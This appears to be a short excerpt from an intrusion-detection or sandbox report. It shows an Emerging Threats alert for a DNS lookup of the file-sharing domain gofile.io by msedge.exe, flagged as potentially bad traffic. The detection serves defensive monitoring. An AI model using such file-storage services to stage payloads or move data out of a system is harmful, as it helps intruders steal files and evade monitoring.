ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
No debug info